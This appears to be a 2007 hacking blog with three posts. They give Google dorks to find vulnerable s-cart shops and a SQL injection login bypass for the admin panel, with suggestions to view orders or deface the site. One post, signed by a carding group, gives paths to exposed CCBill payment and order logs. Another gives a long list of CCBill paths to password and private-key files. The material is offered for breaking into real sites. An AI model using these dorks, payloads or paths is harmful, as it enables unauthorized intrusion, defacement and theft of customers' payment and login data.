Saturday, April 7, 2007

bugs File : admin page --> /admin

bugs File : admin page --> /admin

Display : http://target.com/s-cart/admin


1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"

2. Get the target site like --> http://www.target.com/s-cart/index.phtml

3. and now go to admin page with change the Url to :

http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!

login : admin
passwd : 'or''='


4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let's to try :P~

posted by iseng at 8:28 AM 0 Comments

Bug CCBill

Bug do CCBill
¯¯¯¯¯¯¯¯¯¯¯¯¯

Bug: CCBill

Banco de dados:

order.log
ccbill.log
currenty.log

Diretَrio exposto:

/ccbill/secure/
/ccbill

Vل no google e procure por " allinurl: /ccbill/ "
Modifique o resultado com as strings:

Ex:

Site:

www.site.com/ccbill/

Strings:

www.site.com/ccbill/secure/order.log
www.site.com/ccbill/ccbill.log
www.site.com/ccbill/secure/currenty.log
www.site.com/ccbill/currenty.log

sedex10 - #Carder Group

posted by iseng at 8:27 AM 0 Comments

contoh pada allinurl"ccbill"

trihuynh zeeup com wrote:
>
> Yes, the script is really unsecure. Some of my clients' sites was defaced
> a couple days ago. I don't know much about those dudes from CCBill, but it
> looks like they don't care much about security. Here is also some other
> files you should check too :
>
> /ccbill/ccbill-local.cgi
> /ccbill/secure/ccbill.log
> /cgi-bin/test.cgi (sometimes these dudes at CCBill forgets to remove the
> script they use to test the client's servers)
>
> There are no reasons that any remote users to access thoses files.
>


This page:

http://www.xs4all.nl/~frico/exploit.htm

has a list of well-known insecure webserver scripts / paths / exploits -
including rather a lot of other CCBill references...

eg:

/admin/ccbill-.cgi
/admin/ccbill-local.cgi
/admin/ccbill-local.cgi?cmd=MENU
/admin/ccbill-local.pl?cmd=MENU

[...]

/ccbill.log
/ccbill/.memberfile
/ccbill/_vti_cnf/
/ccbill/ccbill-.cgi
/ccbill/ccbill-local.cgi
/ccbill/ccbill-local.pl
/ccbill/male/password/.htpasswd
/ccbill/members/.htpasswd
/ccbill/Msbilllog.txt
/ccbill/newpass.txt
/ccbill/password/.htpassfile
/ccbill/password/.htpasswd
/ccbill/password/.htpasswd.410
/ccbill/password/.htpasswd.bak
/ccbill/password/.htpasswd20227
/ccbill/password/.htpasswd-bak
/ccbill/password_manager/
/ccbill/secure/.htnew
/ccbill/secure/.htpasswd
/ccbill/secure/cbill.log
/ccbill/secure/ccbill.log
/cc-bill/secure/ccbill.log
/ccbill/secure/ccbill.log
/ccbill/secure/current.log
/ccbill/secure/current.log-bak
/ccbill/secure/history.dat
/ccbill/secure/password
/ccbill/secure/private_key
/ccbill/secure/purge
/ccbill/secure/secure/ccbill.log
/ccbill/secure/WS_FTP.LOG
/ccbill/secured/
/ccbill/secured/current.log-bak
/ccbill/welcome.htm
/ccbill/whereami.cgi
/ccbill2/.htpasswd
/ccbill2/access.log
/ccbill2/male/password/.htpasswd
/ccbill2/password/.htpassfile
/ccbill2/password/.htpasswd
/ccbill2/password_manager/
/ccbill2/secure/.htpasswd
/ccbill2/secure/current.log
/ccbill2/secured/.htpasswd
/ccbill2/secured/current.log
/ccbill5/secure/ccbill.log
/ccbill-local.cgi
/ccbill-local.pl

posted by iseng at 8:24 AM 0 Comments